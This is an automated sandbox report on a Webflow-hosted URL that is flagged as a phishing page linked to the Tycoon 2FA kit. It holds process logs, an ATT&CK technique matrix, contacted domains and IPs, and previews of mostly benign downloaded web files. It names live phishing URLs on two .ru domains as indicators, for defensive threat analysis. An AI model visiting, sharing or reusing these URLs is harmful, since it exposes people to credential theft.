              Source: unknownHTTPS traffic detected: 172.67.148.100:443 -> 192.168.2.4:49760 version: TLS 1.2
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir2744_388439698Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir2744_388439698Jump to behavior
              Source: classification engineClassification label: mal100.phis.evad.win@22/22@20/11
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2576,i,238525167681460180,11121848182826903600,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2632 /prefetch:3
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://littlestownseniorhighschool.webflow.io/"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2576,i,238525167681460180,11121848182826903600,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2632 /prefetch:3Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: 1.5.d.script.csv, type: HTML
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
              Browser Extensions
              1
              Process Injection
              1
              Masquerading
              OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Process Injection
              LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              File Deletion
              Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
              Ingress Tool Transfer
              Traffic DuplicationData Destruction
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1651125 URL: https://littlestownseniorhi... Startdate: 28/03/2025 Architecture: WINDOWS Score: 100 22 Antivirus detection for URL or domain 2->22 24 Yara detected AntiDebug via timestamp check 2->24 26 Yara detected Tycoon 2FA PaaS 2->26 28 6 other signatures 2->28 6 chrome.exe 2 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 14 192.168.2.4, 138, 443, 49214 unknown unknown 6->14 11 chrome.exe 6->11         started        process5 dnsIp6 16 fgof.koxicarev.ru 104.21.73.212, 443, 49752, 49753 CLOUDFLARENETUS United States 11->16 18 www.google.com 142.251.40.164, 443, 49731, 49766 GOOGLEUS United States 11->18 20 8 other IPs or domains 11->20

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              https://littlestownseniorhighschool.webflow.io/0%Avira URL Cloudsafe
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://fgof.koxicarev.ru/favicon.ico100%Avira URL Cloudphishing
              https://i8yr.viugbu.ru/bhanchod@ac8zycz0%Avira URL Cloudsafe
              https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.5.1.min.dc5e7f18c8.js?site=67e2c79fd85ebcb1b252e590%Avira URL Cloudsafe
              https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.5.1.min.dc5e7f18c8.js?site=67e2c79fd85ebcb1b252e5940%Avira URL Cloudsafe

              Download Network PCAP: filteredfull

              NameIPActiveMaliciousAntivirus DetectionReputation
              littlestownseniorhighschool.webflow.io
              104.18.36.248
              truefalse
                unknown
                d3e54v103j8qbb.cloudfront.net
                13.33.251.68
                truefalse
                  high
                  a.nel.cloudflare.com
                  35.190.80.1
                  truefalse
                    high
                    fgof.koxicarev.ru
                    104.21.73.212
                    truetrue
                      unknown
                      cdn.prod.website-files.com
                      104.18.160.117
                      truefalse
                        high
                        www.google.com
                        142.251.40.164
                        truefalse
                          high
                          i8yr.viugbu.ru
                          104.21.95.206
                          truefalse
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            https://cdn.prod.website-files.com/img/favicon.icofalse
                              high
                              https://i8yr.viugbu.ru/bhanchod@ac8zyczfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://cdn.prod.website-files.com/67e2c79fd85ebcb1b252e594/css/littlestownseniorhighschool.webflow.7e3e20a4b.cssfalse
                                high
                                https://fgof.koxicarev.ru/zXMKsj/true
                                  unknown
                                  https://d3e54v103j8qbb.cloudfront.net/img/webflow-badge-text-d2.c82cec3b78.svgfalse
                                    high
                                    https://fgof.koxicarev.ru/favicon.icofalse
                                    • Avira URL Cloud: phishing
                                    unknown
                                    https://littlestownseniorhighschool.webflow.io/true
                                      unknown
                                      https://d3e54v103j8qbb.cloudfront.net/img/webflow-badge-icon-d2.89e12c322e.svgfalse
                                        high
                                        https://cdn.prod.website-files.com/67e2c79fd85ebcb1b252e594/js/webflow.751e0867.f68fe005672cde30.jsfalse
                                          high
                                          https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.5.1.min.dc5e7f18c8.js?site=67e2c79fd85ebcb1b252e594false
                                          • Avira URL Cloud: safe
                                          unknown
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.5.1.min.dc5e7f18c8.js?site=67e2c79fd85ebcb1b252e59chromecache_58.2.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://FgoF.koxicarev.ru/zXMKsj/chromecache_58.2.drfalse
                                            unknown
                                            https://cdn.prod.website-files.com/67e2c79fd85ebcb1b252e594/css/littlestownseniorhighschool.webflow.chromecache_58.2.drfalse
                                              high
                                              https://cdn.prod.website-files.com/img/webclip.pngchromecache_58.2.drfalse
                                                high
                                                https://webflow.comchromecache_58.2.drfalse
                                                  high
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  104.18.36.248
                                                  littlestownseniorhighschool.webflow.ioUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  104.18.160.117
                                                  cdn.prod.website-files.comUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  104.18.161.117
                                                  unknownUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  104.21.73.212
                                                  fgof.koxicarev.ruUnited States
                                                  13335CLOUDFLARENETUStrue
                                                  172.67.148.100
                                                  unknownUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  142.251.40.164
                                                  www.google.comUnited States
                                                  15169GOOGLEUSfalse
                                                  13.33.251.210
                                                  unknownUnited States
                                                  16509AMAZON-02USfalse
                                                  13.33.251.68
                                                  d3e54v103j8qbb.cloudfront.netUnited States
                                                  16509AMAZON-02USfalse
                                                  104.21.95.206
                                                  i8yr.viugbu.ruUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  35.190.80.1
                                                  a.nel.cloudflare.comUnited States
                                                  15169GOOGLEUSfalse
                                                  IP
                                                  192.168.2.4
                                                  Joe Sandbox version:42.0.0 Malachite
                                                  Analysis ID:1651125
                                                  Start date and time:2025-03-28 13:41:34 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 3m 6s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:browseurl.jbs
                                                  Sample URL:https://littlestownseniorhighschool.webflow.io/
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:20
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.phis.evad.win@22/22@20/11
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 142.250.72.99, 142.250.80.78, 172.253.122.84, 142.250.80.14, 23.203.176.221, 151.101.46.172, 142.251.35.163, 23.204.23.20, 172.202.163.200
                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, accounts.google.com, redirector.gvt1.com, ocsp.digicert.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  • VT rate limit hit for: https://littlestownseniorhighschool.webflow.io/
                                                  No simulations
                                                  No context
                                                  No context
                                                  No context
                                                  No context
                                                  No context
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65451)
                                                  Category:downloaded
                                                  Size (bytes):89476
                                                  Entropy (8bit):5.2896589255084425
                                                  Encrypted:false
                                                  SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                                  MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                  SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                  SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                  SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.5.1.min.dc5e7f18c8.js?site=67e2c79fd85ebcb1b252e594
                                                  Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:downloaded
                                                  Size (bytes):421
                                                  Entropy (8bit):4.951302343646692
                                                  Encrypted:false
                                                  SSDEEP:6:tnryQovcumc4slvtM65tLApUcsw6RnDH4aFJA3ST3EGn4UGhbexTVQG6eJYLwqQq:travcuXM65hA6BrvT3gfQTVVPJYLwq7H
                                                  MD5:89E12C322E66C81213861FC9ACB8B003
                                                  SHA1:6A1A186CEDADCEF3D7D2FFD04F275D94A54E7930
                                                  SHA-256:00F45354C11A12591485977633A0E03952CDF1FF2DE403E10EC846DB8CC508A9
                                                  SHA-512:E8092977116E2B795957F36A7112A0C91DD053D8EE842B8A90D6A83F762B838C034BB31E225215C3AF850CAC0FA4B922835CECD507C5EA7E1C18DE1AB7AD80CF
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://d3e54v103j8qbb.cloudfront.net/img/webflow-badge-icon-d2.89e12c322e.svg
                                                  Preview:<svg width="26" height="16" viewBox="0 0 26 16" fill="none" xmlns="http://www.w3.org/2000/svg">.<path fill-rule="evenodd" clip-rule="evenodd" d="M25.65 0L17.4654 16H9.77778L13.203 9.36892H13.0493C10.2235 13.0372 6.00738 15.452 0 16V9.46068C0 9.46068 3.84306 9.23369 6.10229 6.85844H0V0.000126383H6.85832V5.64099L7.01225 5.64036L9.8148 0.000126383H15.0016V5.60523L15.1555 5.60497L18.0632 0H25.65Z" fill="#146EF5"/>.</svg>.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:1
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1924), with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):1926
                                                  Entropy (8bit):5.348454776853866
                                                  Encrypted:false
                                                  SSDEEP:48:YFyOkXzbALgnC4iGba2o+wb+C9nPCy9zVmz6:GybjbALTZbzZpC6
                                                  MD5:E3D643DE9FC43A10AD32B3FF84AF6F23
                                                  SHA1:4C6C679877B1F863C9D63E046AEE0869C9CC56B1
                                                  SHA-256:FC3194917A944BE5275ADBCD733A1446B9E0B7E9876363AB4852AD5DCBD4A4A9
                                                  SHA-512:D2B7771C9C7D4157FDA30078CC899537F88C333D570CA9E867EE2C3CDAE7A4C7D3777F3ABAA3C42EA820D0EC4E4CDA3214FB70B928D24D7849E7710ED10E2F83
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://littlestownseniorhighschool.webflow.io/
                                                  Preview:<!DOCTYPE html> This site was created in Webflow. https://webflow.com --> Last Published: Tue Mar 25 2025 15:13:43 GMT+0000 (Coordinated Universal Time) --><html data-wf-domain="littlestownseniorhighschool.webflow.io" data-wf-page="67e2c79fd85ebcb1b252e59b" data-wf-site="67e2c79fd85ebcb1b252e594" data-wf-status="1"><head><meta charset="utf-8"/><title>LittlestownSeniorHighSchool</title><meta content="width=device-width, initial-scale=1" name="viewport"/><meta content="Webflow" name="generator"/><link href="https://cdn.prod.website-files.com/67e2c79fd85ebcb1b252e594/css/littlestownseniorhighschool.webflow.7e3e20a4b.css" rel="stylesheet" type="text/css"/><script type="text/javascript">!function(o,c){var n=c.documentElement,t=" w-mod-";n.className+=t+"js",("ontouchstart"in o||o.DocumentTouch&&c instanceof DocumentTouch)&&(n.className+=t+"touch")}(window,document);</script><link href="https://cdn.prod.website-files.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon"/><link
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                  Category:dropped
                                                  Size (bytes):15086
                                                  Entropy (8bit):3.4582181256178264
                                                  Encrypted:false
                                                  SSDEEP:96:jQ2eQFXKn5O0NkoqpWyRuaoiQ5733LimpFim+xuUbw:jzFan5O0qbMy4d3bBWnuU
                                                  MD5:1F894F487D068A2CED95D5CD4F88598C
                                                  SHA1:743A2C39F538650D53664D19AB5079CFC9BA55D2
                                                  SHA-256:4239819D399860EB27D8A73417F9BD108D45D11676F68B5EDAAE328EC197D55E
                                                  SHA-512:A9BD551FA9F297083351B37DDE9CE6080D14433D26215561875C5A3E8C6EA8ABBE8F5F3204793A7EF9690A4563A2BC640E6A32CFF15F9A9BB42CD322CE1F2717
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......$..................92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (36033), with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):36033
                                                  Entropy (8bit):5.283379212790306
                                                  Encrypted:false
                                                  SSDEEP:768:5+nVkbGISJz29VhVI5Zx3KT6rPBW3Cqv/HnUwBCr26+7v0:snVkbGISQ6rBWVB4
                                                  MD5:C2BAEB117CAFF557B76166E9BF46D467
                                                  SHA1:8128E3C804753253FA42D3E7C78B1B664425A073
                                                  SHA-256:1896EE7E979BDD3A4CC0BA8169DAD527BDD09E8335AA75A4034162E348E26293
                                                  SHA-512:8E1A664EB356901EE655B3734772EA44EE302007F1282D37AE060B1676D919E0AABB8E0A122B726157CF163CD362D507279BA73B82371533C1703159AFC386E9
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://cdn.prod.website-files.com/67e2c79fd85ebcb1b252e594/js/webflow.751e0867.f68fe005672cde30.js
                                                  Preview:(()=>{var t={487:function(){"use strict";window.tram=function(t){function e(t,e){return(new C.Bare).init(t,e)}function n(t){var e=parseInt(t.slice(1),16);return[e>>16&255,e>>8&255,255&e]}function i(t,e,n){return"#"+(0x1000000|t<<16|e<<8|n).toString(16).slice(1)}function r(){}function o(t,e,n){if(void 0!==e&&(n=e),void 0===t)return n;var i=n;return Z.test(t)||!K.test(t)?i=parseInt(t,10):K.test(t)&&(i=1e3*parseFloat(t)),0>i&&(i=0),i==i?i:n}function a(t){B.debug&&window&&window.console.warn(t)}var s,u,c,l=function(t,e,n){function i(t){return"object"==typeof t}function r(t){return"function"==typeof t}function o(){}return function a(s,u){function c(){var t=new l;return r(t.init)&&t.init.apply(t,arguments),t}function l(){}u===n&&(u=s,s=Object),c.Bare=l;var f,h=o[t]=s[t],d=l[t]=c[t]=new o;return d.constructor=c,c.mixin=function(e){return l[t]=c[t]=a(c,e)[t],c},c.open=function(t){if(f={},r(t)?f=t.call(c,d,h,c,s):i(t)&&(f=t),i(f))for(var n in f)e.call(f,n)&&(d[n]=f[n]);return r(d.init)||(d.init
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:dropped
                                                  Size (bytes):9912
                                                  Entropy (8bit):3.9529563769674163
                                                  Encrypted:false
                                                  SSDEEP:192:gLTccPJ37c1fhYJ0VCa8wDY+WCYTx4Pqze9CJCmVjDsUGoT:9KMV8AITHz4Xm9lGoT
                                                  MD5:C82CEC3B78A2B2D267BBFE3C7E838068
                                                  SHA1:70ED58A020C395EED69E3000CB27B7B0FA191360
                                                  SHA-256:3202CB640FADA345AB99415BD087F28E6FEA1C3009DBA51D183CC37BCE036CD7
                                                  SHA-512:85EEF3C4FC445742ED656ACC0600CCECF4F88043E5F2638484E73C6543E5CFB4DD7FBBFA90FC34628C2A1FA1BB0BC5052DF8C1EB454534674BAA4A34C4D94F6B
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:<svg width="118" height="12" viewBox="0 0 118 12" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M0.525024 0.896484H3.05432L6.00776 8.26622L8.89905 0.896484H11.3531V11H9.47327V3.79949L6.6637 11H5.18713L2.3844 3.92077V11H0.525024V0.896484Z" fill="#080808"/>.<path d="M16.152 11.1367C15.4912 11.1367 14.901 10.9704 14.3815 10.6377C13.8665 10.305 13.4609 9.84017 13.1647 9.24316C12.8684 8.6416 12.7226 7.94889 12.7272 7.16504C12.7272 6.38118 12.8776 5.69076 13.1783 5.09375C13.4791 4.49674 13.8893 4.03646 14.4088 3.71289C14.9329 3.38477 15.5276 3.22298 16.193 3.22754C16.6305 3.22754 17.0361 3.30957 17.4098 3.47363C17.7835 3.63314 18.0934 3.85417 18.3395 4.13672C18.5901 4.41471 18.7542 4.71777 18.8317 5.0459L18.4967 5.03223V3.37109H20.3698V11H18.5172L18.524 9.52344L18.8522 9.33203C18.7428 9.66927 18.5559 9.97461 18.2916 10.248C18.0273 10.5215 17.7083 10.738 17.3346 10.8975C16.9609 11.057 16.5667 11.1367 16.152 11.1367ZM16.5621 9.55078C16.9495 9.55078 17.2936 9.45052 17.5944 9.25C17.89
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (2587)
                                                  Category:downloaded
                                                  Size (bytes):37300
                                                  Entropy (8bit):5.225019630523386
                                                  Encrypted:false
                                                  SSDEEP:768:AyNf7A1RE/GqyFVF54mkxWaIi1aUuF9Zl0F6FhF8FPqkowKji/JVxL:Aye1REeqyP0XcPyjowKjY
                                                  MD5:7E3E20A4BE6111B2C861236217837712
                                                  SHA1:31192F23416AF77A88768ED3F10CAA0F362CFBC8
                                                  SHA-256:CAA17FA240FF763618476D4DB81F98E953DD5812FC5580A4644128022D9A82FA
                                                  SHA-512:1803E4495655EDCF1881B044313DA8F0596381B91FBDABA7D8E8C985E9383F746FDA8195A1A07AE0B5048EE4E46C51275753205F3B2545CBF8E74A1EA7774582
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://cdn.prod.website-files.com/67e2c79fd85ebcb1b252e594/css/littlestownseniorhighschool.webflow.7e3e20a4b.css
                                                  Preview:html {. -webkit-text-size-adjust: 100%;. -ms-text-size-adjust: 100%;. font-family: sans-serif;.}..body {. margin: 0;.}..article, aside, details, figcaption, figure, footer, header, hgroup, main, menu, nav, section, summary {. display: block;.}..audio, canvas, progress, video {. vertical-align: baseline;. display: inline-block;.}..audio:not([controls]) {. height: 0;. display: none;.}..[hidden], template {. display: none;.}..a {. background-color: #0000;.}..a:active, a:hover {. outline: 0;.}..abbr[title] {. border-bottom: 1px dotted;.}..b, strong {. font-weight: bold;.}..dfn {. font-style: italic;.}..h1 {. margin: .67em 0;. font-size: 2em;.}..mark {. color: #000;. background: #ff0;.}..small {. font-size: 80%;.}..sub, sup {. vertical-align: baseline;. font-size: 75%;. line-height: 0;. position: relative;.}..sup {. top: -.5em;.}..sub {. bottom: -.25em;.}..img {. border: 0;.}..svg:not(:root) {. overflow: hidden;.}..hr {. box-sizing: content-box;. height: 0;.}..
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:downloaded
                                                  Size (bytes):9912
                                                  Entropy (8bit):3.9529563769674163
                                                  Encrypted:false
                                                  SSDEEP:192:gLTccPJ37c1fhYJ0VCa8wDY+WCYTx4Pqze9CJCmVjDsUGoT:9KMV8AITHz4Xm9lGoT
                                                  MD5:C82CEC3B78A2B2D267BBFE3C7E838068
                                                  SHA1:70ED58A020C395EED69E3000CB27B7B0FA191360
                                                  SHA-256:3202CB640FADA345AB99415BD087F28E6FEA1C3009DBA51D183CC37BCE036CD7
                                                  SHA-512:85EEF3C4FC445742ED656ACC0600CCECF4F88043E5F2638484E73C6543E5CFB4DD7FBBFA90FC34628C2A1FA1BB0BC5052DF8C1EB454534674BAA4A34C4D94F6B
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://d3e54v103j8qbb.cloudfront.net/img/webflow-badge-text-d2.c82cec3b78.svg
                                                  Preview:<svg width="118" height="12" viewBox="0 0 118 12" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M0.525024 0.896484H3.05432L6.00776 8.26622L8.89905 0.896484H11.3531V11H9.47327V3.79949L6.6637 11H5.18713L2.3844 3.92077V11H0.525024V0.896484Z" fill="#080808"/>.<path d="M16.152 11.1367C15.4912 11.1367 14.901 10.9704 14.3815 10.6377C13.8665 10.305 13.4609 9.84017 13.1647 9.24316C12.8684 8.6416 12.7226 7.94889 12.7272 7.16504C12.7272 6.38118 12.8776 5.69076 13.1783 5.09375C13.4791 4.49674 13.8893 4.03646 14.4088 3.71289C14.9329 3.38477 15.5276 3.22298 16.193 3.22754C16.6305 3.22754 17.0361 3.30957 17.4098 3.47363C17.7835 3.63314 18.0934 3.85417 18.3395 4.13672C18.5901 4.41471 18.7542 4.71777 18.8317 5.0459L18.4967 5.03223V3.37109H20.3698V11H18.5172L18.524 9.52344L18.8522 9.33203C18.7428 9.66927 18.5559 9.97461 18.2916 10.248C18.0273 10.5215 17.7083 10.738 17.3346 10.8975C16.9609 11.057 16.5667 11.1367 16.152 11.1367ZM16.5621 9.55078C16.9495 9.55078 17.2936 9.45052 17.5944 9.25C17.89
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:HTML document, ASCII text, with very long lines (65364)
                                                  Category:downloaded
                                                  Size (bytes):567971
                                                  Entropy (8bit):3.901730245145576
                                                  Encrypted:false
                                                  SSDEEP:1536:X9nJCC7nen8mB9nJCC7nen8mRLB8FLB8b:NJ/7nenhJ/7nenRwg
                                                  MD5:DE4C6633E6CCD72F6EEB8B214BAE4E91
